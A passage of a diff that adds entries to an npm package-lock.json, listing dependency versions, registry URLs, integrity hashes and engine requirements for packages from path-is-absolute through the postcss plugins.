"sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", + "engines": { + "node": ">=8" + } + }, + "node_modules/path-is-absolute": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", + "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/path-key": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", + "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "engines": { + "node": ">=8" + } + }, + "node_modules/path-loader": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/path-loader/-/path-loader-1.0.10.tgz", + "integrity": "sha512-CMP0v6S6z8PHeJ6NFVyVJm6WyJjIwFvyz2b0n2/4bKdS/0uZa/9sKUlYZzubrn3zuDRU0zIuEDX9DZYQ2ZI8TA==", + "dependencies": { + "native-promise-only": "^0.8.1", + "superagent": "^3.8.3" + } + }, + "node_modules/path-parse": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", + "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" + }, + "node_modules/path-scurry": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", + "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", + "dev": true, + "dependencies": { + "lru-cache": "^10.2.0", + "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" + }, + "engines": { + "node": ">=16 || 14 >=14.18" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/path-scurry/node_modules/lru-cache": { + "version": "10.2.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.2.0.tgz", + "integrity": "sha512-2bIM8x+VAf6JT4bKAljS1qUWgMsqZRPGJS6FSahIMPVvctcNhyVp7AJu7quxOW9jwkryBReKZY5tY5JYv2n/7Q==", + "dev": true, + "engines": { + "node": "14 || >=16.14" + } + }, + "node_modules/path-scurry/node_modules/minipass": { + "version": "7.0.4", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.0.4.tgz", + "integrity": "sha512-jYofLM5Dam9279rdkWzqHozUo4ybjdZmCsDHePy5V/PbBcVMiSZR97gmAy45aqi8CK1lG2ECd356FU86avfwUQ==", + "dev": true, + "engines": { + "node": ">=16 || 14 >=14.17" + } + }, + "node_modules/path-to-regexp": { + "version": "0.1.12", + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.12.tgz", + "integrity": "sha512-RA1GjUVMnvYFxuqovrEqZoxxW5NUZqbwKtYz/Tt7nXerk0LbLblQmrsgdeOxV5SFHf0UDggjS/bSeOZwt1pmEQ==", + "license": "MIT" + }, + "node_modules/path-type": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/path-type/-/path-type-4.0.0.tgz", + "integrity": "sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/pathe": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/pathe/-/pathe-2.0.3.tgz", + "integrity": "sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==", + "dev": true, + "license": "MIT" + }, + "node_modules/pathval": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/pathval/-/pathval-1.1.1.tgz", + "integrity": "sha512-Dp6zGqpTdETdR63lehJYPeIOqpiNBNtc7BpWSLrOje7UaIsE5aY92r/AunQA7rsXvet3lrJ3JnZX29UPTKXyKQ==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/pause": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/pause/-/pause-0.0.1.tgz", + "integrity": "sha1-HUCLP9t2kjuVQ9lvtMnf1TXZy10=" + }, + "node_modules/pdf-parse": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/pdf-parse/-/pdf-parse-1.1.1.tgz", + "integrity": "sha512-v6ZJ/efsBpGrGGknjtq9J/oC8tZWq0KWL5vQrk2GlzLEQPUDB1ex+13Rmidl1neNN358Jn9EHZw5y07FFtaC7A==", + "dev": true, + "license": "MIT", + "dependencies": { + "debug": "^3.1.0", + "node-ensure": "^0.0.0" + }, + "engines": { + "node": ">=6.8.1" + } + }, + "node_modules/pdf-parse/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/pdfjs-dist": { + "version": "4.10.38", + "resolved": "https://registry.npmjs.org/pdfjs-dist/-/pdfjs-dist-4.10.38.tgz", + "integrity": "sha512-/Y3fcFrXEAsMjJXeL9J8+ZG9U01LbuWaYypvDW2ycW1jL269L3js3DVBjDJ0Up9Np1uqDXsDrRihHANhZOlwdQ==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=20" + }, + "optionalDependencies": { + "@napi-rs/canvas": "^0.1.65" + } + }, + "node_modules/pend": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz", + "integrity": "sha1-elfrVQpng/kRUzH89GY9XI4AelA=" + }, + "node_modules/performance-now": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", + "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" + }, + "node_modules/pg": { + "version": "8.7.1", + "resolved": "https://registry.npmjs.org/pg/-/pg-8.7.1.tgz", + "integrity": "sha512-7bdYcv7V6U3KAtWjpQJJBww0UEsWuh4yQ/EjNf2HeO/NnvKjpvhEIe/A/TleP6wtmSKnUnghs5A9jUoK6iDdkA==", + "dependencies": { + "buffer-writer": "2.0.0", + "packet-reader": "1.0.0", + "pg-connection-string": "^2.5.0", + "pg-pool": "^3.4.1", + "pg-protocol": "^1.5.0", + "pg-types": "^2.1.0", + "pgpass": "1.x" + }, + "engines": { + "node": ">= 8.0.0" + }, + "peerDependencies": { + "pg-native": ">=2.0.0" + }, + "peerDependenciesMeta": { + "pg-native": { + "optional": true + } + } + }, + "node_modules/pg-connection-string": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/pg-connection-string/-/pg-connection-string-2.5.0.tgz", + "integrity": "sha512-r5o/V/ORTA6TmUnyWZR9nCj1klXCO2CEKNRlVuJptZe85QuhFayC7WeMic7ndayT5IRIR0S0xFxFi2ousartlQ==" + }, + "node_modules/pg-copy-streams": { + "version": "2.2.2", + "resolved": "https://registry.npmjs.org/pg-copy-streams/-/pg-copy-streams-2.2.2.tgz", + "integrity": "sha512-mjSqs6hrsRhBojCuY2hxyg48B+3th5ARBjMxBCEisIqBvdRD0g5ETdbts20TzrOfha8ueJQOmQCJCprtczJtGQ==" + }, + "node_modules/pg-cursor": { + "version": "2.12.1", + "resolved": "https://registry.npmjs.org/pg-cursor/-/pg-cursor-2.12.1.tgz", + "integrity": "sha512-V13tEaA9Oq1w+V6Q3UBIB/blxJrwbbr35/dY54r/86soBJ7xkP236bXaORUTVXUPt9B6Ql2BQu+uwQiuMfRVgg==", + "peerDependencies": { + "pg": "^8" + } + }, + "node_modules/pg-int8": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/pg-int8/-/pg-int8-1.0.1.tgz", + "integrity": "sha512-WCtabS6t3c8SkpDBUlb1kjOs7l66xsGdKpIPZsg4wR+B3+u9UAum2odSsF9tnvxg80h4ZxLWMy4pRjOsFIqQpw==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/pg-pool": { + "version": "3.4.1", + "resolved": "https://registry.npmjs.org/pg-pool/-/pg-pool-3.4.1.tgz", + "integrity": "sha512-TVHxR/gf3MeJRvchgNHxsYsTCHQ+4wm3VIHSS19z8NC0+gioEhq1okDY1sm/TYbfoP6JLFx01s0ShvZ3puP/iQ==", + "peerDependencies": { + "pg": ">=8.0" + } + }, + "node_modules/pg-protocol": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/pg-protocol/-/pg-protocol-1.5.0.tgz", + "integrity": "sha512-muRttij7H8TqRNu/DxrAJQITO4Ac7RmX3Klyr/9mJEOBeIpgnF8f9jAfRz5d3XwQZl5qBjF9gLsUtMPJE0vezQ==" + }, + "node_modules/pg-query-stream": { + "version": "4.7.1", + "resolved": "https://registry.npmjs.org/pg-query-stream/-/pg-query-stream-4.7.1.tgz", + "integrity": "sha512-UMgsgn/pOIYsIifRySp59vwlpTpLADMK9HWJtq5ff0Z3MxBnPMGnCQeaQl5VuL+7ov4F96mSzIRIcz+Duo6OiQ==", + "dependencies": { + "pg-cursor": "^2.12.1" + }, + "peerDependencies": { + "pg": "^8" + } + }, + "node_modules/pg-types": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/pg-types/-/pg-types-2.2.0.tgz", + "integrity": "sha512-qTAAlrEsl8s4OiEQY69wDvcMIdQN6wdz5ojQiOy6YRMuynxenON0O5oCpJI6lshc6scgAY8qvJ2On/p+CXY0GA==", + "dependencies": { + "pg-int8": "1.0.1", + "postgres-array": "~2.0.0", + "postgres-bytea": "~1.0.0", + "postgres-date": "~1.0.4", + "postgres-interval": "^1.1.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/pgpass": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/pgpass/-/pgpass-1.0.5.tgz", + "integrity": "sha512-FdW9r/jQZhSeohs1Z3sI1yxFQNFvMcnmfuj4WBMUTxOrAyLMaTcE1aAMBiTlbMNaXvBCQuVi0R7hd8udDSP7ug==", + "dependencies": { + "split2": "^4.1.0" + } + }, + "node_modules/picocolors": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.1.tgz", + "integrity": "sha512-anP1Z8qwhkbmu7MFP5iTt+wQKXgwzf7zTyGlcdzabySa9vd0Xt392U0rVmz9poOaBj0uHJKyyo9/upk0HrEQew==" + }, + "node_modules/picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", + "engines": { + "node": ">=8.6" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" + } + }, + "node_modules/pify": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/pify/-/pify-2.3.0.tgz", + "integrity": "sha1-7RQaasBDqEnqWISY59yosVMw6Qw=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/pinkie": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/pinkie/-/pinkie-2.0.4.tgz", + "integrity": "sha1-clVrgM+g1IqXToDnckjoDtT3+HA=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/pinkie-promise": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/pinkie-promise/-/pinkie-promise-2.0.1.tgz", + "integrity": "sha1-ITXW36ejWMBprJsXh3YogihFD/o=", + "dependencies": { + "pinkie": "^2.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/pirates": { + "version": "4.0.6", + "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", + "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/pkg-dir": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", + "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", + "dev": true, + "dependencies": { + "find-up": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/pkg-dir/node_modules/find-up": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", + "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "dev": true, + "dependencies": { + "locate-path": "^5.0.0", + "path-exists": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/pkg-dir/node_modules/locate-path": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", + "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "dev": true, + "dependencies": { + "p-locate": "^4.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/pkg-dir/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/pkg-dir/node_modules/p-locate": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", + "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "dev": true, + "dependencies": { + "p-limit": "^2.2.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/pkg-types": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/pkg-types/-/pkg-types-1.3.1.tgz", + "integrity": "sha512-/Jm5M4RvtBFVkKWRu2BLUTNP8/M2a+UwuAX+ae4770q1qVGtfjG+WTCupoZixokjmHiry8uI+dlY8KXYV5HVVQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "confbox": "^0.1.8", + "mlly": "^1.7.4", + "pathe": "^2.0.1" + } + }, + "node_modules/pkg-up": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/pkg-up/-/pkg-up-3.1.0.tgz", + "integrity": "sha512-nDywThFk1i4BQK4twPQ6TA4RT8bDY96yeuCVBWL3ePARCiEKDRSrNGbFIgUJpLp+XeIR65v8ra7WuJOFUBtkMA==", + "dev": true, + "dependencies": { + "find-up": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/pkg-up/node_modules/find-up": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-3.0.0.tgz", + "integrity": "sha512-1yD6RmLI1XBfxugvORwlck6f75tYL+iR0jqwsOrOxMZyGYqUuDhJ0l4AXdO1iX/FTs9cBAMEk1gWSEx1kSbylg==", + "dev": true, + "dependencies": { + "locate-path": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/pkg-up/node_modules/locate-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-3.0.0.tgz", + "integrity": "sha512-7AO748wWnIhNqAuaty2ZWHkQHRSNfPVIsPIfwEOWO22AmaoVrWavlOcMR5nzTLNYvp36X220/maaRsrec1G65A==", + "dev": true, + "dependencies": { + "p-locate": "^3.0.0", + "path-exists": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/pkg-up/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/pkg-up/node_modules/p-locate": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-3.0.0.tgz", + "integrity": "sha512-x+12w/To+4GFfgJhBEpiDcLozRJGegY+Ei7/z0tSLkMmxGZNybVMSfWj9aJn8Z5Fc7dBUNJOOVgPv2H7IwulSQ==", + "dev": true, + "dependencies": { + "p-limit": "^2.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/pkg-up/node_modules/path-exists": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-3.0.0.tgz", + "integrity": "sha512-bpC7GYwiDYQ4wYLe+FA8lhRjhQCMcQGuSgGGqDkg/QerRWw9CmGRT0iSOVRSZJ29NMLZgIzqaljJ63oaL4NIJQ==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/platform": { + "version": "1.3.6", + "resolved": "https://registry.npmjs.org/platform/-/platform-1.3.6.tgz", + "integrity": "sha512-fnWVljUchTro6RiCFvCXBbNhJc2NijN7oIQxbwsyL0buWJPG85v81ehlHI9fXrJsMNgTofEoWIQeClKpgxFLrg==", + "dev": true + }, + "node_modules/pluralize": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/pluralize/-/pluralize-8.0.0.tgz", + "integrity": "sha512-Nc3IT5yHzflTfbjgqWcCPpo7DaKy4FnpB0l/zCAW0Tc7jxAiuqSxHasntB3D7887LSrA93kDJ9IXovxJYxyLCA==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/pngjs": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/pngjs/-/pngjs-5.0.0.tgz", + "integrity": "sha512-40QW5YalBNfQo5yRYmiw7Yz6TKKVr3h6970B2YE+3fQpsWcrbj1PzJgxeJ19DRQjhMbKPIuMY8rFaXc8moolVw==", + "dev": true, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/policyfile": { + "version": "0.0.4", + "resolved": "https://registry.npmjs.org/policyfile/-/policyfile-0.0.4.tgz", + "integrity": "sha512-UfDtlscNialXfmVEwEPm0t/5qtM0xPK025eYWd/ilv89hxLIhVQmt3QIzMHincLO2MBtZyww0386pt13J4aIhQ==", + "engines": { + "node": "*" + } + }, + "node_modules/polished": { + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/polished/-/polished-4.3.1.tgz", + "integrity": "sha512-OBatVyC/N7SCW/FaDHrSd+vn0o5cS855TOmYi4OkdWUMSJCET/xip//ch8xGUvtr3i44X9LVyWwQlRMTN3pwSA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/runtime": "^7.17.8" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/posix-character-classes": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/posix-character-classes/-/posix-character-classes-0.1.1.tgz", + "integrity": "sha512-xTgYBc3fuo7Yt7JbiuFxSYGToMoz8fLoE6TC9Wx1P/u+LfeThMOAqmuyECnlBaaJb+u1m9hHiXUEtwW4OzfUJg==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/possible-typed-array-names": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/possible-typed-array-names/-/possible-typed-array-names-1.0.0.tgz", + "integrity": "sha512-d7Uw+eZoloe0EHDIYoe+bQ5WXnGMOpmiZFTuMWCwpjzzkL2nTjcKiAk4hh8TjnGye2TwWOk3UXucZ+3rbmBa8Q==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/postcss": { + "version": "8.4.38", + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.38.tgz", + "integrity": "sha512-Wglpdk03BSfXkHoQa3b/oulrotAkwrlLDRSOb9D0bN86FdRyE9lppSp33aHNPgBa0JKCoB+drFLZkQoRRYae5A==", + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/postcss" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "nanoid": "^3.3.7", + "picocolors": "^1.0.0", + "source-map-js": "^1.2.0" + }, + "engines": { + "node": "^10 || ^12 || >=14" + } + }, + "node_modules/postcss-attribute-case-insensitive": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/postcss-attribute-case-insensitive/-/postcss-attribute-case-insensitive-6.0.2.tgz", + "integrity": "sha512-IRuCwwAAQbgaLhxQdQcIIK0dCVXg3XDUnzgKD8iwdiYdwU4rMWRWyl/W9/0nA4ihVpq5pyALiHB2veBJ0292pw==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-calc": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/postcss-calc/-/postcss-calc-9.0.1.tgz", + "integrity": "sha512-TipgjGyzP5QzEhsOZUaIkeO5mKeMFpebWzRogWG/ysonUlnHcq5aJe0jOjpfzUU8PeSaBQnrE8ehR0QA5vs8PQ==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.11", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.2" + } + }, + "node_modules/postcss-clamp": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/postcss-clamp/-/postcss-clamp-4.1.0.tgz", + "integrity": "sha512-ry4b1Llo/9zz+PKC+030KUnPITTJAHeOwjfAyyB60eT0AorGLdzp52s31OsPRHRf8NchkgFoG2y6fCfn1IV1Ow==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": ">=7.6.0" + }, + "peerDependencies": { + "postcss": "^8.4.6" + } + }, + "node_modules/postcss-color-functional-notation": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/postcss-color-functional-notation/-/postcss-color-functional-notation-5.1.0.tgz", + "integrity": "sha512-w2R4py6zrVE1U7FwNaAc76tNQlG9GLkrBbcFw+VhUjyDDiV28vfZG+l4LyPmpoQpeSJVtu8VgNjE8Jv5SpC7dQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/postcss-progressive-custom-properties": "^2.3.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-color-hex-alpha": { + "version": "9.0.2", + "resolved": "https://registry.npmjs.org/postcss-color-hex-alpha/-/postcss-color-hex-alpha-9.0.2.tgz", + "integrity": "sha512-SfPjgr//VQ/DOCf80STIAsdAs7sbIbxATvVmd+Ec7JvR8onz9pjawhq3BJM3Pie40EE3TyB0P6hft16D33Nlyg==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-color-rebeccapurple": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/postcss-color-rebeccapurple/-/postcss-color-rebeccapurple-8.0.2.tgz", + "integrity": "sha512-xWf/JmAxVoB5bltHpXk+uGRoGFwu4WDAR7210el+iyvTdqiKpDhtcT8N3edXMoVJY0WHFMrKMUieql/wRNiXkw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-colormin": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-colormin/-/postcss-colormin-6.0.0.tgz", + "integrity": "sha512-EuO+bAUmutWoZYgHn2T1dG1pPqHU6L4TjzPlu4t1wZGXQ/fxV16xg2EJmYi0z+6r+MGV1yvpx1BHkUaRrPa2bw==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "caniuse-api": "^3.0.0", + "colord": "^2.9.1", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-convert-values": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-convert-values/-/postcss-convert-values-6.0.0.tgz", + "integrity": "sha512-U5D8QhVwqT++ecmy8rnTb+RL9n/B806UVaS3m60lqle4YDFcpbS3ae5bTQIh3wOGUSDHSEtMYLs/38dNG7EYFw==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-custom-media": { + "version": "9.1.5", + "resolved": "https://registry.npmjs.org/postcss-custom-media/-/postcss-custom-media-9.1.5.tgz", + "integrity": "sha512-GStyWMz7Qbo/Gtw1xVspzVSX8eipgNg4lpsO3CAeY4/A1mzok+RV6MCv3fg62trWijh/lYEj6vps4o8JcBBpDA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/cascade-layer-name-parser": "^1.0.2", + "@csstools/css-parser-algorithms": "^2.2.0", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/media-query-list-parser": "^2.1.1" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-custom-properties": { + "version": "13.3.2", + "resolved": "https://registry.npmjs.org/postcss-custom-properties/-/postcss-custom-properties-13.3.2.tgz", + "integrity": "sha512-2Coszybpo8lpLY24vy2CYv9AasiZ39/bs8Imv0pWMq55Gl8NWzfc24OAo3zIX7rc6uUJAqESnVOMZ6V6lpMjJA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/cascade-layer-name-parser": "^1.0.5", + "@csstools/css-parser-algorithms": "^2.3.2", + "@csstools/css-tokenizer": "^2.2.1", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-custom-selectors": { + "version": "7.1.6", + "resolved": "https://registry.npmjs.org/postcss-custom-selectors/-/postcss-custom-selectors-7.1.6.tgz", + "integrity": "sha512-svsjWRaxqL3vAzv71dV0/65P24/FB8TbPX+lWyyf9SZ7aZm4S4NhCn7N3Bg+Z5sZunG3FS8xQ80LrCU9hb37cw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/cascade-layer-name-parser": "^1.0.5", + "@csstools/css-parser-algorithms": "^2.3.2", + "@csstools/css-tokenizer": "^2.2.1", + "postcss-selector-parser": "^6.0.13" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-dir-pseudo-class": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/postcss-dir-pseudo-class/-/postcss-dir-pseudo-class-7.0.2.tgz", + "integrity": "sha512-cMnslilYxBf9k3qejnovrUONZx1rXeUZJw06fgIUBzABJe3D2LiLL5WAER7Imt3nrkaIgG05XZBztueLEf5P8w==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-discard-comments": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-discard-comments/-/postcss-discard-comments-6.0.0.tgz", + "integrity": "sha512-p2skSGqzPMZkEQvJsgnkBhCn8gI7NzRH2683EEjrIkoMiwRELx68yoUJ3q3DGSGuQ8Ug9Gsn+OuDr46yfO+eFw==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + 